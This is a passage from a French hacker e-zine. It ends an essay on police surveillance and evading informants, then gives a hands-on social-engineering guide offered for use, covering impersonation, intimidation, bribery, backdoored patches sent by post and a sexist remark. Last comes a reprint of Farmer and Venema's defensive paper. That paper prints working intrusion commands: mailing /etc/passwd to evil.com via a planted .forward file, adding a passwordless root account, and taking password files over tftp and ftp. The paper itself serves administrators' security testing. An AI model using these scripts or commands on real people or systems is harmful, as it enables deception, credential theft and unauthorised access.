- S'il n'y a pas eu plainte par contre mais que selon eux vous devenez trop
- dangereux, alors ils font une descente chez vous, il vous font une grande
- frayeur et s'arrangent pour que vous rencardiez et informiez sur les
- hackers encore actifs pendant plusieurs mois, voir des ANNEES !!!
-
- L'Underground est ainsi decimé, et il est bien sûr impossible
- de prévoir si vous êtes ou pas sur la "liste d'attente pour la casserole" de
- la DST. Ainsi, il n'y a pas de moyen de véritablement "transmettre" son
- savoir en toute sécurité.
-
- >Les moyens et les méthodes de la DST:
- =====================================
- La DST a vraiment beaucoup de moyens pour tracker un pirate.
- Par exemple, ils ont une équipe de spécialiste en informatique et
- qui peuvent aider à tout moment les inspecteurs dans leur enquete.
- Ils savent précisement comment agissent les hackers et connaissent
- en général leurs habitudes ( chevaux de troie - crackers de mot de
- passe - worms - backdoors - passes & méthodes )
- Si par exemple, ils ne sont pas sur qu'une personne à telle adresse
- soit un hacker, ils peuvent envoyer des personnes déguisées en
- femme de ménage (je ne suis pas parano) sans aucun problème. Il ont
- des relations qui leur permettent d'avoir * n'importe * quelle
- information provenant d'une école par le censeur ou même les profs.
- Les écoutes sont bien sûr monaie courante et ils n'ont pas besoin
- faire des écoutes sauvages... Une carte de la DST ouvre tous les
- Centres Principaux d'Exploitation sans problème.
- Ils utilisent d'autre part une technologie de pointe au niveau de
- l'espionnage informatique. Il s'agit du TEMPEST.
- Le principe en est ma foi très simple. Vous savez certainnement que
- tout courant qui passe dans un fil éléctrique non-blindé produit un
- champ magnétique et qu'un circuit electronique en fonctionnement
- possède des composants électroniques qui oscillent quand ils sont
- dans certains états et ainsi emettent soit sur une frequence
- radioéléctrique soit avec un signal électromagnique. Ces signaux
- peuvent être détecté de très loin grâce à des instruments
- de haute précision. On peut très bien décoder les caractères frappé
- sur un clavier qui transitent par le cable ou bien ce qui s'affiche
- sur un écran.
- Le TEMPEST est l'ensemble ORDINATEUR - DECODEUR - AMPLIFICATEUR -
- ANTENNE qui permet de recevoir en clair les informations provenant
- de l'ordinateur distant sans aucune liaison que ce soit (à part
- l'air).
- Ils ont l'habitude de faire du TEMPEST sur les claviers, les disques
- durs, les minitels et les cables modem (jamais sur le CPU).
-
- Quand à leurs méthodes, eh bien elles sont simples et efficaces
- en général.
- Tout d'abord, il y a une surveillance constante des serveurs à
- risques comme ceux des anciens pirates, des serveurs comme RTEL où,
- d'une manière ou d'une autre, il s'arrangent pour "tenir" le SYSOP
- et lui imposer un scan sur des mots-cles comme "hacker", "blue box"
- "pirat","NUA","TRANSPAC","NUI","CC","CARTE PASTEL"du style grep(1).
- Bien sur, si un club leur parait suspect, ils peuvent aussitot
- passer un coup de fil au SYSOP et lui demander le Pass.
- Vous pensez bien aussi que toutes les adresses laissées en BAL sont
- relevées.
- (liste des serveurs écoutés & filtrés: QSD/The Line, RTEL, CHEZ,
- TEASER et bien sûr RTEL.)
- (liste des serveurs très certainnements soumis à ces pratiques:
- ELIOTT, POUR, PIRATE, AATEL)
- Ils s'arrangent aussi pour récuperer le log des appelants avec les
- adresses des PAVIs correspondants aux pseudos.
- Ainsi, ils ont une table approximative qui donne pour chaque pseudo le
- département d'origine.
- Une histoire significative de leur méthode est arrivée en
- 1988-1989 avec Jean Claude Michot alors SYSOP de QBBS.
- Si vous vous rappelez bien, QBBS demandait l'adresse et le numéro de
- téléphone de chaque user voulant avoir un compte. Il était précisé que
- cela resterait confidentiel.
- Mais JCM était un pirate (pas un des meilleurs), et de plus, il n'avait
- pas grande morale. JCM donc s'était fait prendre par la DST, et ils ont
- marchandé un abandon des charges vis à vis de son affaire (le
- troc de sa liberté) contre le fichier d'adresse avec la correspondance
- avec le pseudo.
- JCM qui n'est pas très respectable ni honête à préféré divulguer ce
- fichier plutôt que d'assumer son erreur! (non pas d'avoir piraté, sa
- seule erreur est celle de s'être fait prendre à mon sens!)
- Mais je suis sûr que la DST a été très persuasive ce qui peut quelque
- peu nous permettre de le pardonner.
- La DST quand elle est démunie de moyens de tracking contre une
- personne ou un groupe s'arrange pour d'abord voir qui fait quoi (quels
- pseudos sont les auteurs de tel ou tel hack) puis ensuite essaye de
- voir avec quelles personnes correspondent le hacker.
- Ils s'arrangent pour trouver les personnes susceptibles sur le serveur
- d'avoir le numéro de téléphone du hacker ou ses coordonnées et ensuite
- font une descente chez ces dites personnes.
- En leur faisant vraiment très très peur et avec leur terrible persuasion,
- ils arrivent presque toujours a faire comprendre a cette personne qu'elle
- n'aura pas d'ennui si elle dit le numéro de tel ou tel pseudo (qui est le
- hacker).
- Encore une bonne raison de ne pas montrer son amitié envers certainne
- personne en public et une encore meilleure raison pour ne jamais, Oh grand
- jamais, donner ses coordonnées ou son numéro de téléphone.
-
- >La DST et la loi Godfrain:
- ==========================
- Personnellement, j'en ai beaucoup voulu à la DST pour ses actions
- que je trouvais injustes mais finalement, on ne peut pas trop s'attaquer
- (au point de vue idéologique je parle) à la DST et à ses actions.
- Mais la DST n'est qu'un outil du pouvoir et par pouvoir, je fais référence
- au système soit-disant "démocratique" non au mouvement politique qui
- pourrait être en place à ce moment. Je ne veux pas traiter de politique
- ici, ce n'est absolument pas le but de ce Newsletter/Technical Journal.
- Ce qui est mauvais est en fait seulement la Loi Godfrain anti-hacker.
- Cette loi en effet désigne comme délit le fait de venir sur un systême
- d'information. Mais à ce moment, comment différencier un système où l'on
- a le droit d'accèder d'un systême où cela est interdit.
- Un message: "Acces à cet ordinateur interdit aux personnes non autorisées"
- ne suffit pas à mon avis.
- Qui sont les personnes non autorisées?
- De plus, ce genre de message est généralement en Anglais, je ne suis
- absolument pas pour la francisation de tout mais tout le monde ne comprend
- pas l'anglais! [FUCK TOUBON au fait, ++NeurAlien/94]
- De toute facon, la loi reste la même pour les systèmes ayant une bannière de
- prévention que pour les systèmes sans. Ainsi, demain on peut venir m'arrèter
- pour être allé sur RTEL ou sur TEASER!
- Est-ce normal?
- A ce moment, c'est la porte ouverte à la loi de classe... En effet, une telle
- loi sera applicable à toute personne et seule les personnes gênantes pour
- l'état seront visées.
- Dans cette vision, on aura bientôt plus besoin de justifier une arrestation.
- Et pourtant ce n'est pas "1984", ce sont seulement les conséquences de 1988
- (date du vote de cette loi).
- J'aimerai interviewer les votants pour cette loi et voir s'ils mesuraient
- l'ampleur de leur vote.
-
- >CONCLUSION:
- ===========
- Nous possédons quand même des moyens de nous faire entendre.
- La branche active des H / P peut laisser des messages d'informations sur les
- systêmes "ouverts" et la branche médiatique peut informer les mass-médias.
- Mais là encore, le gouvernement aura beaucoup de mal à revenir sur une de
- ses erreurs et utilisera tout son pouvoir de manipulation d'opinion pour
- persuader les Français du bien fondé de cette loi.
- Nous avons même la possibilité de faire un lobbie comme aux USA, un
- groupe de pression et faire changer cette loi. Mais tout reste à faire et
- nous ne devons pas laisser ces politicards grabataires, avides de pouvoir et
- d'argent faire des lois répressives donnant aux juges-pantin les pleins
- pouvoirs sur nos existences.
- L'image de l'underground a été trop souvent terni par les sociétés
- ayant peur de notre capacité à montrer leurs incompétences et leurs
- manipulations douteuses et aussi par les gouvernements voulant brider et
- dominer les moyens informatique et, pour cela, les limitèrent à leurs
- technocrates et leurs industries de pointe qu'ils controlent déja.
- Imaginez seulement le réseau étendu à chaque citoyen d'un pays.
- Ce serait la libre discussion et avec quelques règles pour rendre le réseau
- viable, personne n'aurait plus à faire la guerre pour faire entendre son
- opinion. Ne serait-ce pas là la démocratie?
-
- Il est temps de montrer cette crasse politique et économique qui
- a déja sérieusement limité l'extension de ces merveilleuses technologies.
- Sensibilisez votre entourage. Montez vos propre moyens d'actions et faites
- entendre votre opinion. Nous somme une force qui peut très bien libérer
- les réseaux de la main-mise des sociétés et de l'état.
-
-
- L I B E R O N S L E S R E S E A U X ! ! !
-
- free the net !
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.10
-
-
- ><
-
- :O :o :I :! :/ L'art du social engineering :O :o :I :! :/
-
- ><
-
- par NeurAlien
-
- Si utile contre les grosses entreprise "à la big brother", le social
- engineering permet d'attaquer un des points les plus faible de la société:
- le personnel.
-
- Je vais vous enseigner ici les choses que j'ai connue d'une pratique
- courante et de l'enseignement de The Dude, maitre en l'art du social
- engineering à Hack-Tic en Hollande.
-
- Tout d'abord, le concept. Le social engineering couremment abrevié SE
- est l'art de se faire passer pour quelqu'un d'autre pour avoir des informations
- sur n'importe quoi.
- Pour cela, il faut etre convaicant, réagir comme la vraie personne et surtout
- utiliser beaucoup de psychologie.
-
- Exemple de SE classique:
- Employée de FT au service exterieur: "France telecom bonjour,"
- Hacker: "Bonjour, Monsieur Levallois du CPE d'Orléans" [Toujours essayer de
- placer le maximum
- d'acronymes dans la
- conversation]
- H: "Nous avons besoin de la liste des préfixes de numéro vert internationaux
- par pays car nous avons un problème avec un des carriers."
- FT: "Pardon? Je ne comprends pas bien. "
- H: "J'ai besoin de la liste des 0590 indiquant le pays selon le préfixe!"
- FT: "Attendez monsieur, je cherche... <pause> alors, Pour sprint....."
- [ Et voila, c'est gagné ! ]
-
- LA REGLE ULTIME DE CET ART
-
- Il y a une chose et une seule qui vous garantira une maitrise parfaite
- des correspondants lors d'une séance de SE, c'est la PRATIQUE.
- On peut lire tout ce que l'on voudra sur la serrurerie, si on ne pratique pas,
- on ne sera jamais un serrurier.
-
- Donc lisez ce G-Phile avec toute l'attention que vos cellules grises
- peuvent y mettre et lancez vous.
-
- Quelques règles de base:
- =======================
- - preparez un petit papier avant d'appeler mentionnant qui vous etes, ce que
- vous voulez et preparant des reponses toutes prêtes pour certaines questions
- bateaux. Mettez au point le scenario, votre nom, ce que vous voulez.
- - Toujours garder l'initiative dans la conversation: c'est vous qui posez les
- questions.
- - Ne pas faire du social engineering si votre voix est celle d'un jeune garcon
- de 13 ans.
- - ne jamais s'affoler ou raccrocher brutalement quand on vous pose un question
- qui vous dérange.
- - faites le par fun si vous le voulez mais vous n'aurez jamais les meilleurs
- résultats si vous le faites tout le temps d'une cabine sans préparation.
- - plus on a d'informations pointues sur la société, plus le SE est possible.
- Il est des fois TRES fructueux de faire les poubelles de la société avant
- d'essayer le SE sur ses employés.
-
- Quelques scénarios qui marchent:
- ===============================
- vous pouvez vous faire passer pour
- . utilisateur/acheteur
- . personne connue
- . urgence/flic/docteur
- . questionnaire/enquête
- . pour la presse, ca marche tres souvent mais on ne recoit pas d'information
- détaillée.
- Il faut aussi jouer sur les sentiments de votre correspondant:
- - la peur: en cas de probleme, faites comprendre que cela peut lui attirer des
- ennuis: foudres du patron, (pour l'employé)
- fisc sur le dos, (pour le petit patron d'une PME)
- arrestation, (pour un individu)
- coupure du téléphone,
- coupure EDF...
- - plaisir: collaboration contre cadeau ex: questionnaire avec un
- &greedy cadeau au bout si les reponses semblent véritable en
- expliquant que c'est parce beaucoup de monde ne répond pas
- en toute honneteté.
- On peut aussi annoncer un FAX qui doit arriver et qui est assez confidentiel et
- necessitant une réponse immédiate.
- Les bruits de bureaux en bruit de fond ou de salle d'ordinateur sont
- interressant.
- Etre à deux peut être utile car ainsi si il y a un probleme, vous dites:
- "bon, je vous passe mon supérieur mais il ne va pas être satisfait"
- appuyez sur une touche du téléphone et envoyez une petite musique directement
- au telephone."
- Ne pas dire que vous etes de la tele: cela ne fait pas reel!
- Pour un questionnaire, il peut être interressant de noyer les questions
- interressantes dans un flot de question ininterressantes.
- Un bon plan pour un coup de fil est:
- - depart lent ou on explique bien
- - des que la personne cède, on accélère le rythme pour qu'elle reste dans
- cet état d'esprit.
- Un autre est d'envoyer des patchs constructeurs par la poste concernant des
- failles de sécurité avec des backdoor dans les patchs.
- On peut aussi essayer de simuler un appel de la sécurité et d'envoyer un login.
- Il y a aussi la possibilité de se faire passer pour la femme d'un informaticien
- qui lui a demandé de télécharger un fichier depuis son téléphone de voiture
- pour qu'il puisse aller directement à un ses rendez vous apres etre passer chez
- lui prendre le fichier et qui n'arrive pas a se connecter. Enfin, se faire
- passer marche souvent bien quand on dit qu'on a un probleme car les femmes sont
- généralement prises pour des burnes en informatique.
- Utilisez les idiots.
-
- En cas de problème lors de la conversation:
- ==========================================
- Si on vous demande "Pourquoi voulez vous ceci..."
- 2 règles: - toujours répondre
- - emphase sur le "PARCE QUE" (psycho involved)
- (réponse bateau : "on en a besoin pour...." )
- Montrer que si ils facilitent les choses vous rendrez les choses plus faciles
- pour eux aussi.
- Si votre correspondant refuse de vous répondre, demandez leur superviseur
- ou supérieur.
-
- Les bonnes cibles:
- =================
- Le SE dépend énormément de votre adaptation à la personne qui est à
- l'autre bout du fil. Vous devez toujours être en position de supériorité.
- Pour cela, il faut déja attaquer des personnes qui ont l'habitude de recevoir
- des ordres.
-
- Ainsi, il est préférable de ne pas parler à l'administrateur mais
- plutot à son assistant.
-
- Bibliographie:
- =============
- Pr. Zuin "The first 4/5 minutes"
- Dale Carnegie "Hoz to win friends and influence people"
- Baladin Press "The private handbook"
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.11
-
-
- Nota: j'ai mis ce fichier car il traite presque parfaitement des nouveau type
- de hacking que l'on peut faire.
- C'est vraiment un document EXCELLENT !!
- _ _ _
-
- _Improving the Security of Your Site by Breaking Into it_
-
- Dan Farmer Wietse Venema
- Sun Microsystems Eindhoven University of Technology
- zen@sun.com wietse@wzv.win.tue.nl
-
- Introduction
- ------------
-
- Every day, all over the world, computer networks and hosts are being
- broken into. The level of sophistication of these attacks varies
- widely; while it is generally believed that most break-ins succeed due
- to weak passwords, there are still a large number of intrusions that use
- more advanced techniques to break in. Less is known about the latter
- types of break-ins, because by their very nature they are much harder to
- detect.
-
- -----
-
- CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
- Purdue. Sun. You name it, we've seen it broken into. Anything that is
- on the Internet (and many that isn't) seems to be fairly easy game. Are
- these targets unusual? What happened?
-
- Fade to...
-
- A young boy, with greasy blonde hair, sitting in a dark room. The room
- is illuminated only by the luminescense of the C64's 40 character
- screen. Taking another long drag from his Benson and Hedges cigarette,
- the weary system cracker telnets to the next faceless ".mil" site on his
- hit list. "guest -- guest", "root -- root", and "system -- manager" all
- fail. No matter. He has all night... he pencils the host off of his
- list, and tiredly types in the next potential victim...
-
- This seems to be the popular image of a system cracker. Young,
- inexperienced, and possessing vast quantities of time to waste, to get
- into just one more system. However, there is a far more dangerous type
- of system cracker out there. One who knows the ins and outs of the
- latest security auditing and cracking tools, who can modify them for
- specific attacks, and who can write his/her own programs. One who not
- only reads about the latest security holes, but also personally
- discovers bugs and vulnerabilities. A deadly creature that can both
- strike poisonously and hide its tracks without a whisper or hint of a
- trail. The uebercracker is here.
-
- -----
-
- Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
- uebermensch, or, literally translated into English, "over man."
- Nietzsche used the term not to refer to a comic book superman, but
- instead a man who had gone beyond the incompetence, pettiness, and
- weakness of the everyday man. The uebercracker is therefore the system
- cracker who has gone beyond simple cookbook methods of breaking into
- systems. An uebercracker is not usually motivated to perform random
- acts of violence. Targets are not arbitrary -- there is a purpose,
- whether it be personal monetary gain, a hit and run raid for
- information, or a challenge to strike a major or prestigious site or
- net.personality. An uebercracker is hard to detect, harder to stop, and
- hardest to keep out of your site for good.
-
- Overview
- --------
-
- In this paper we will take an unusual approach to system security.
- Instead of merely saying that something is a problem, we will look
- through the eyes of a potential intruder, and show _why_ it is one. We
- will illustrate that even seemingly harmless network services can become
- valuable tools in the search for weak points of a system, even when
- these services are operating exactly as they are intended to.
-
- In an effort to shed some light on how more advanced intrusions occur,
- this paper outlines various mechanisms that crackers have actually used
- to obtain access to systems and, in addition, some techniques we either
- suspect intruders of using, or that we have used ourselves in tests or
- in friendly/authorized environments.
-
- Our motivation for writing this paper is that system administrators are
- often unaware of the dangers presented by anything beyond the most
- trivial attacks. While it is widely known that the proper level of
- protection depends on what has to be protected, many sites appear to
- lack the resources to assess what level of host and network security is
- adequate. By showing what intruders can do to gain access to a remote
- site, we are trying to help system administrators to make _informed_
- decisions on how to secure their site -- or not. We will limit the
- discussion to techniques that can give a remote intruder access to a
- (possibly non-interactive) shell process on a UNIX host. Once this is
- achieved, the details of obtaining root privilege are beyond the scope
- of this work -- we consider them too site-dependent and, in many cases,
- too trivial to merit much discussion.
-
- We want to stress that we will not merely run down a list of bugs or
- security holes -- there will always be new ones for a potential attacker
- to exploit. The purpose of this paper is to try to get the reader to
- look at her or his system in a new way -- one that will hopefully afford
- him or her the opportunity to _understand_ how their system can be
- compromised, and how.
-
- We would also like to reiterate to the reader that the purpose of this
- paper is to show you how to test the security of your own site, not how
- to break into other people's systems. The intrusion techniques we
- illustrate here will often leave traces in your system auditing logs --
- it might be constructive to examine them after trying some of these
- attacks out, to see what a real attack might look like. Certainly other
- sites and system administrators will take a very dim view of your
- activities if you decide to use their hosts for security testing without
- advance authorization; indeed, it is quite possible that legal action
- may be pursued against you if they perceive it as an attack.
-
- There are four main parts to the paper. The first part is the
- introduction and overview. The second part attempts to give the reader
- a feel for what it is like to be an intruder and how to go from knowing
- nothing about a system to compromising its security. This section goes
- over actual techniques to gain information and entrance and covers basic
- strategies such as exploiting trust and abusing improperly configured
- basic network services (ftp, mail, tftp, etc.) It also discusses
- slightly more advanced topics, such as NIS and NFS, as well as various
- common bugs and configuration problems that are somewhat more OS or
- system specific. Defensive strategies against each of the various
- attacks are also covered here.
-
- The third section deals with trust: how the security of one system
- depends on the integrity of other systems. Trust is the most complex
- subject in this paper, and for the sake of brevity we will limit the
- discussion to clients in disguise.
-
- The fourth section covers the basic steps that a system administrator
- may take to protect her or his system. Most of the methods presented
- here are merely common sense, but they are often ignored in practice --
- one of our goals is to show just how dangerous it can be to ignore basic
- security practices.
-
- Case studies, pointers to security-related information, and software are
- described in the appendices at the end of the paper.
-
- While exploring the methods and strategies discussed in this paper we we
- wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
- shell, perl, expect and C, it examines a remote host or set of hosts and
- gathers as much information as possible by remotely probing NIS, finger,
- NFS, ftp and tftp, rexd, and other services. This information includes
- the presence of various network information services as well as
- potential security flaws -- usually in the form of incorrectly setup or
- configured network services, well-known bugs in system or network
- utilities, or poor or ignorant policy decisions. It then can either
- report on this data or use an expert system to further investigate any
- potential security problems. While SATAN doesn't use all of the methods
- that we discuss in the paper, it has succeeded with ominous regularity
- in finding serious holes in the security of Internet sites. It will be
- posted and made available via anonymous ftp when completed; Appendix A
- covers its salient features.
-
- Note that it isn't possible to cover all possible methods of breaking
- into systems in a single paper. Indeed, we won't cover two of the most
- effective methods of breaking into hosts: social engineering and
- password cracking. The latter method is so effective, however, that
- several of the strategies presented here are geared towards acquiring
- password files. In addition, while windowing systems (X, OpenWindows,
- etc.) can provide a fertile ground for exploitation, we simply don't
- know many methods that are used to break into remote systems. Many
- system crackers use non-bitmapped terminals which can prevent them from
- using some of the more interesting methods to exploit windowing systems
- effectively (although being able to monitor the victim's keyboard is
- often sufficient to capture passwords). Finally, while worms, viruses,
- trojan horses, and other malware are very interesting, they are not
- common (on UNIX systems) and probably will use similar techniques to the
- ones we describe in this paper as individual parts to their attack
- strategy.
-
- Gaining Information
- -------------------
-
- Let us assume that you are the head system administrator of Victim
- Incorporated's network of UNIX workstations. In an effort to secure
- your machines, you ask a friendly system administrator from a nearby
- site (evil.com) to give you an account on one of her machines so that
- you can look at your own system's security from the outside.
-
- What should you do? First, try to gather information about your
- (target) host. There is a wealth of network services to look at:
- finger, showmount, and rpcinfo are good starting points. But don't stop
- there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
- and as many other services as you can find. There are so many methods
- and techniques that space precludes us from showing all of them, but we
- will try to show a cross-section of the most common and/or dangerous
- strategies that we have seen or have thought of. Ideally, you would
- gather such information about all hosts on the subnet or area of attack
- -- information is power -- but for now we'll examine only our intended
- target.
-
- To start out, you look at what the ubiquitous finger command shows you
- (assume it is 6pm, Nov 6, 1993):
-
- victim % finger @victim.com
- [victim.com]
- Login Name TTY Idle When Where
- zen Dr. Fubar co 1d Wed 08:00 death.com
-
- Good! A single idle user -- it is likely that no one will notice if you
- actually manage to break in.
-
- Now you try more tactics. As every finger devotee knows, fingering "@",
- "0", and "", as well as common names, such as root, bin, ftp, system,
- guest, demo, manager, etc., can reveal interesting information. What
- that information is depends on the version of finger that your target is
- running, but the most notable are account names, along with their home
- directories and the host that they last logged in from.
-
- To add to this information, you can use rusers (in particular with the
- -l flag) to get useful information on logged-in users.
-
- Trying these commands on victim.com reveals the following information,
- presented in a compressed tabular form to save space:
-
- Login Home-dir Shell Last login, from where
- ----- -------- ----- ----------------------
- root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
- bin /bin Never logged in
- nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
- daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
- sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
- zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
- sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
- guest /export/foo /bin/sh Never logged in
- ftp /home/ftp Never logged in
-
- Both our experiments with SATAN and watching system crackers at work
- have proved to us that finger is one of the most dangerous services,
- because it is so useful for investigating a potential target. However,
- much of this information is useful only when used in conjunction with
- other data.
-
- For instance, running showmount on your target reveals:
-
- evil % showmount -e victim.com
- export list for victim.com:
- /export (everyone)
- /var (everyone)
- /usr easy
- /export/exec/kvm/sun4c.sunos.4.1.3 easy
- /export/root/easy easy
- /export/swap/easy easy
-
- Note that /export/foo is exported to the world; also note that this is
- user guest's home directory. Time for your first break-in! In this
- case, you'll mount the home directory of user "guest." Since you don't
- have a corresponding account on the local machine and since root cannot
- modify files on an NFS mounted filesystem, you create a "guest" account
- in your local password file. As user guest you can put an .rhosts entry
- in the remote guest home directory, which will allow you to login to the
- target machine without having to supply a password.
-
- evil # mount victim.com:/export/foo /foo
- evil # cd /foo
- evil # ls -lag
- total 3
- 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
- 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
- 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
- evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
- evil # ls -lag
- total 3
- 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
- 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
- 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
- evil # su guest
- evil % echo victim.com >> guest/.rhosts
- evil % rlogin victim.com
- Welcome to victim.com!
- victim %
-
- If, instead of home directories, victim.com were exporting filesystems
- with user commands (say, /usr or /usr/local/bin), you could replace a
- command with a trojan horse that executes any command of your choice.
- The next user to execute that command would execute your program.
-
- We suggest that filesystems be exported:
-
- o Read/write only to specific, trusted clients.
- o Read-only, where possible (data or programs can often be
- exported in this manner.)
-
- If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
- various vendor's machines) or has the netgroups bug (CERT advisory
- 91:12), any non-root user with a login name in the target's password
- file can rlogin to the target without a password. And since the user
- "bin" often owns key files and directories, your next attack is to try
- to log in to the target host and modify the password file to let you
- have root access:
-
- evil % whoami
- bin
- evil % rsh victim.com csh -i
- Warning: no access to tty; thus no job control in this shell...
- victim % ls -ldg /etc
- drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
- victim % cd /etc
- victim % mv passwd pw.old
- victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
- victim % ^D
- evil % rlogin victim.com -l toor
- Welcome to victim.com!
- victim #
-
- A few notes about the method used above; "rsh victim.com csh -i" is used
- to initially get onto the system because it doesn't leave any traces in
- the wtmp or utmp system auditing files, making the rsh invisible for
- finger and who. The remote shell isn't attached to a pseudo-terminal,
- however, so that screen-oriented programs such as pagers and editors
- will fail -- but it is very handy for brief exploration.
-
- The COPS security auditing tool (see appendix D) will report key files
- or directories that are writable to accounts other than the
- superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
- file permission problems. On many systems, rsh probes as shown above,
- even when successful, would remain completely unnoticed; the tcp wrapper
- (appendix D), which logs incoming connections, can help to expose such
- activities.
-
- ----
-
- What now? Have you uncovered all the holes on your target system? Not
- by a long shot. Going back to the finger results on your target, you
- notice that it has an "ftp" account, which usually means that anonymous
- ftp is enabled. Anonymous ftp can be an easy way to get access, as it
- is often misconfigured. For example, the target may have a complete
- copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
- instead of a stripped down version. In this example, though, you see
- that the latter doesn't seem to be true (how can you tell without
- actually examining the file?) However, the home directory of ftp on
- victim.com is writable. This allows you to remotely execute a command
- -- in this case, mailing the password file back to yourself -- by the
- simple method of creating a .forward file that executes a command when
- mail is sent to the ftp account. This is the same mechanism of piping
- mail to a program that the "vacation" program uses to automatically
- reply to mail messages.
-
- evil % cat forward_sucker_file
- "|/bin/mail zen@evil.com < /etc/passwd"
-
- evil % ftp victim.com
- Connected to victim.com
- 220 victim FTP server ready.
- Name (victim.com:zen): ftp
- 331 Guest login ok, send ident as password.
- Password:
- 230 Guest login ok, access restrictions apply.
- ftp> ls -lga
- 200 PORT command successful.
- 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
- total 5
- drwxr-xr-x 4 101 1 512 Jun 20 1991 .
- drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
- drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
- drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
- drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
- 226 ASCII Transfer complete.
- 242 bytes received in 0.066 seconds (3.6 Kbytes/s)
- ftp> put forward_sucker_file .forward
- 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
- ftp> quit
- evil % echo test | mail ftp@victim.com
-
- Now you simply wait for the password file to be sent back to you.
-
- The security auditing tool COPS will check your anonymous ftp setup; see
- the man page for ftpd, the documentation/code for COPS, or CERT advisory
- 93:10 for information on how to set up anonymous ftp correctly.
- Vulnerabilities in ftp are often a matter of incorrect ownership or
- permissions of key files or directories. At the very least, make sure
- that ~ftp and all "system" directories and files below ~ftp are owned by
- root and are not writable by any user.
-
- While looking at ftp, you can check for an older bug that was once
- widely exploited:
-
- % ftp -n
- ftp> open victim.com
- Connected to victim.com
- 220 victim.com FTP server ready.
- ftp> quote user ftp
- 331 Guest login ok, send ident as password.
- ftp> quote cwd ~root
- 530 Please login with USER and PASS.
- ftp> quote pass ftp
- 230 Guest login ok, access restrictions apply.
- ftp> ls -al / (or whatever)
-
- If this works, you now are logged in as root, and able to modify the
- password file, or whatever you desire. If your system exhibits this
- bug, you should definitely get an update to your ftpd daemon, either
- from your vendor or (via anon ftp) from ftp.uu.net.
-
- The wuarchive ftpd, a popular replacement ftp daemon put out by the
- Washington University in Saint Louis, had almost the same problem. If
- your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
- more recent version.
-
- Finally, there is a program vaguely similar to ftp -- tftp, or the
- trivial file transfer program. This daemon doesn't require any password
- for authentication; if a host provides tftp without restricting the
- access (usually via some secure flag set in the inetd.conf file), an
- attacker can read and write files anywhere on the system. In the
- example, you get the remote password file and place it in your local
- /tmp directory:
-
- evil % tftp
- tftp> connect victim.com
- tftp> get /etc/passwd /tmp/passwd.victim
- tftp> quit
-
- For security's sake, tftp should not be run; if tftp is necessary, use
- the secure option/flag to restrict access to a directory that has no
- valuable information, or run it under the control of a chroot wrapper
- program.
-
- ----
-
- If none of the previous methods have worked, it is time to go on to more
- drastic measures. You have a friend in rpcinfo, another very handy
- program, sometimes even more useful than finger. Many hosts run RPC
- services that can be exploited; rpcinfo can talk to the portmapper and
- show you the way. It can tell you if the host is running NIS, if it is
- a NIS server or slave, if a diskless workstation is around, if it is
- running NFS, any of the info services (rusersd, rstatd, etc.), or any
- other unusual programs (auditing or security related). For instance,
- going back to our sample target:
-
- evil % rpcinfo -p victim.com [output trimmed for brevity's sake]
- program vers proto port
- 100004 2 tcp 673 ypserv
- 100005 1 udp 721 mountd
- 100003 2 udp 2049 nfs
- 100026 1 udp 733 bootparam
- 100017 1 tcp 1274 rexd
-
- In this case, you can see several significant facts about our target;
- first of which is that it is an NIS server. It is perhaps not widely
- known, but once you know the NIS domainname of a server, you can get any
- of its NIS maps by a simple rpc query, even when you are outside the
- subnet served by the NIS server (for example, using the YPX program that
- can be found in the comp.sources.misc archives on ftp.uu.net). In
- addition, very much like easily guessed passwords, many systems use
- easily guessed NIS domainnames. Trying to guess the NIS domainname is
- often very fruitful. Good candidates are the fully and partially
- qualified hostname (e.g. "victim" and "victim.com"), the organization
- name, netgroup names in "showmount" output, and so on. If you wanted to
- guess that the domainname was "victim", you could type:
-
- evil % ypwhich -d victim victim.com
- Domain victim not bound.
-
- This was an unsuccessful attempt; if you had guessed correctly it would
- have returned with the host name of victim.com's NIS server. However,
- note from the NFS section that victim.com is exporting the "/var"
- directory to the world. All that is needed is to mount this directory
- and look in the "yp" subdirectory -- among other things you will see
- another subdirectory that contains the domainname of the target.
-
- evil # mount victim.com:/var /foo
- evil # cd /foo
- evil # /bin/ls -alg /foo/yp
- total 17
- 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
- 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
- 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
- 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
- 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
- [...]
-
- In this case, "foo_bar" is the NIS domain name.
-
- In addition, the NIS maps often contain a good list of user/employee
- names as well as internal host lists, not to mention passwords for
- cracking.
-
- Appendix C details the results of a case study on NIS password files.
-
- ----
-
